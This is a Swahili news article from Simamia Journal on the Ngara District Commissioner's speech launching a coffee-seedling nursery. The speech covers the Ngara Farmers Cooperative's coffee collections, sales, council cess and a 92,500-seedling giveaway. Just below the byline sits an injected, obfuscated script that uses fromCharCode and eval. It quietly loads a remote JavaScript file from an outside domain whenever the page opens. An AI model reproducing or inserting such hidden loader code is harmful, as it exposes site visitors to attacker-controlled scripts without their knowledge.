Recent Comments

NGARA FARMERS YAGAWA MICHE YA KAHAWA 92,500 KWA WAKULIMA 72,000

By Simamia Journal Nov 5, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Akizunngumza na Mamia ya Wannchi waliohudhuria hafla fupi ya Uzinduzi wa Ugawaji miche ya Kahawa, Mkuu wa Wilaya ya Ngara ambaye alikuwa Mgeni Rasmi alitoa Hotuba ifuatayo:-

Mh. Mwenyekiti wa Chama Cha Mapinduzi wilaya ya Ngara,

Mh. Mwenyekiti wa Halmashauri ya wilaya ya Ngara,

Mh. Katibu Tawala wilaya,

Mkurugenzi Mtendaji wa Halmashauri ya wilaya ya Ngara,

Mwakilishi wa Mh. Mbunge Jimbo la Ngara,

Meneja Maendeleo ya Kahawa Kanda ya ziwa,

Mwenyekiti wa Ngara Farmers Cooperative Society Ltd na wajumbe wa Bodi ya chama,

Viongozi mbalimbali, wakuu wa Idara na Menejimenti ya Ngara Farmers Cooperative Society Ltd,

Wageni waalikwa wote, wakulima wa kahawa mabibi na mabwana “Jamhuri ya Muungano wa Tanzania…….”

 

Ndugu viongozi  na wakulima mliopo mahali hapa, napenda kuwakaribisha katika hafla hii fupi ya uzinduzi wa kitalu cha miche ya kahawa Rulenge ambacho kimeanzishwa na Chama chetu cha msingi cha wakulima wilayani Ngara, Ngara Farmers Cooperative Society Ltd.

Chama chetu hiki kilisajiriwa tarehe 04/05/1993 kwa namba ya usajiri KAR 227 kwa lengo kuu la kukusanya mazao ya wakulima, kuyachakata na kuyatafutia masoko mazuri kwaajili ya wanachama na wakulima wilayani Ngara. Ngara Farmers Cooperative Society Ltd iliundwa kwa muunganiko wa vyama vya msingi (AMCOS) 12 ndani ya wilaya ya Ngara ambazo ni RULENGE RPCS, KANAZI RPCS, MUGOMA RPCS, MABAWE RPCS, BUGARAMA RPCS, KIRUSHYA RPCS, KIBIMBA RPCS, KIBIMBA RPCS, NTOBEYE RPCS, NYAMIAGA RPCS, BUKIRIRO RPCS na NYAKISASA RPCS. Hadi sasa chama chetu hiki kinahudumia zaidi ya wakulima na wanachama elfu saba (7,000) kutoka maeneo mbalimbali katika kata zaidi ya 17 (kumi na saba).

USIMAMIZI WA MAKUSANYO YA KAHAWA WILAYANI

Ngara Farmers Cooperative Society Ltd kama chama cha msingi cha wakulima kimeendelea kusimamia ukusanyaji wa kahawa ya maganda kutoka kwa wanachama na wakulima wilayani Ngara kwa kuzingatia sheria na taratibu za Vyama vya Ushirika na miongozo yake. Chama chetu hiki kimefanikiwa kukusanya  kiasi cha kilo za maganda za kahawa 8,553,334 sawa na tani 8,553 kuanzia msimu wa 2018/2019 hadi msimu huu 2021/2022. Kahawa hiyo ina thamani ya kiasi cha shs. 10,178,082,640/= (Bilioni kumi, milioni mia moja sabini na nane themanini na mbili elfu mia sita arobaini tu).

 

USIMAMIZI WA MAUZO YA KAHAWA SAFI (CLEAN COFFEE) KWA NIABA YA WANACHAMA

Chama chetu cha msingi Ngara Farmers Cooperative Society Ltd kimeendelea kufanya usimamizi wa kahawa ya wakulima katika hali ya kutafuta masoko mazuri ambapo kuanzia msimu wa 2018/2019 hadi msimu huu 2021/2022 chama kimeweza kusimamia uuzwaji wa kahawa safi kilo 3,846,840 zenye thamani ya 11,222,135,945.80/= (Bilioni kumi na moja, milioni mia mbili ishirini na mbili, laki moja thelathini na tano elfu mia tisa arobaini na tano na senti themanini tu).

 

USHURU WA CHAMA KWA HALMASHAURI YA WILAYA YETU YA NGARA (CESS)

Ndugu viongozi mbalimbali, waalikwa na wakulima wote mliopo hapa, kwa kuzingatia na kuheshimu sheria ya kahawa ya mwaka 2001, na kanuni zake za mwaka 2013 chama kimefanikiwa kulipa ushuru wa Halmashauri (Cess) ambayo ni 3% ya mauzo kwa mchanganuo ufuatao;

 

Msimu Kilo zilizokusanywa Ushuru uliolipwa (Halmashauri) Tshs
2018/2019 2,335,026 70,050,780
2019/2020 1,542,470 50,901,510
2020/2021 2,462,838 87,662,168
2021/2022 1,869,000 62,300,000
JUMLA 8,209,334 270,914,458/=

 

Chama kinatarajia kuendelea kutoa michango ya ushuru mbalimbali hasa ushuru wa Halmashauri kwa misimu ijayo ili kuendelea kuchangia pato letu la ndani kwa wilaya yetu ya Ngara.

 

KAHAWA KAMA ZAO LA KIMKAKATI

Kwa kupitia sera ya serikali ya mazao ya kimkakati, zao la kahawa ni miongoni mwa mazao ya kimkakati hasa kwa mkoa wa Kagera na wilaya ya Ngara kwa ujumla. Katika kipindi cha misimu minne (2018/2019, 2019/2020, 2020/2021 na 2021/2022) chama chetu kupitia usimamizi wa Taasisi za Serikali kama vile Bodi ya Kahawa Tanzania (TCB) na Taasisi ya Utafiti wa zao la kahawa (Tacri) kimeweza kutoa na kugawa bure miche zaidi ya 36,962 kwa wakulima wa maeneo mbalimbali kwa lengo la kuongeza uzalishaji wa zao hili wilayani Ngara. Chama kupitia uzinduzi nitakaoufanya leo, kinatarajia kugawa bure miche 92,500 ya Robusta na Arabika kwa wakulima wa wilaya ya Ngara.

 

Serikali inaendelea na dhana ya kuamini kuwa zao la kahawa hasa kwa wakulima wa wilaya ya Ngara ni chachu ya maendeleo ya kiuchumi na kijamii kwa wakulima wa wilaya ya Ngara na taifa kwa ujumla. Aidha kupitia mkakati madhubuti wa Serikali hasa kupitia Taasisi yake ya Bodi ya Kahawa Tanzania, mipango ya miradi ya vitaru vya uzalishaji wa miche ya kahawa hasa kwa wilaya ya Ngara itaendelea kwa kusaidizana na wadau wa maendeleo ya zao hili kama vile Ofisi yangu ya Mkuu wa wilaya, Halmashauri, Chama chetu cha Ushirika, Vyombo vya habari na wadau wengine wote wa maendeleo ya zao hili.

 

Serikali ya wilaya kupitia ofisi yangu inaendelea kuhimiza juu ya ustawi wa vyama vya ushirika hasa kwa kuchukulia mfano wa chama chetu cha Ngara Farmers Cooperative Society Ltd katika kusimamia rasilimali za wanachama wake na hatimae kuleta tija ya kimaendeleo kwa wanachama hao na chama kwa ujumla. Serikali haitavumilia vitendo vya ubadhirifu ambao unaweza aidha kufanywa na watu wachache wenye nio ovu na chama chetu hiki.

 

Kwa kuhitimisha napenda kutoa nasaha kwa wakulima wote watakaopokea miche hii kutoka kwa chama chao kuipanda kwa kuzingatia maelekezo ya wataalam wa kilimo waliopo katika maeneo yao. Wapo maafisa ugani waliopo maeneo ya katani hadi vijijini watumieni kulima kahawa hiyo vizuri ili kuweza kutengeneza mavuno mazuri hapo badae. Niwaase pia maafisa ugani waliopo maeneo ya vijijini kufanya kazi kwa weledi na kujituma kwa hali ya juu, tumieni mafunzo na uelewa wenu kuwaelimisha wakulima hawa jinsi na namna bora ya kulima miche hii. Zaidi niwapongeze viongozi na Menejimenti ya Ngara Farmers Cooperative Society Ltd kwa ushupavu wenu wa kuweza kusimamia jambo hili pasipo kuteteleka, mradi kama huu uwe chachu na kwa taasisi nyingine kuiga mfano wa chama chetu hiki wilyani Ngara.

Nawatakia ulimaji wa kahawa wenye tija kwa maendeleo ya wilaya yetu na Taifa kwa ujmla

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv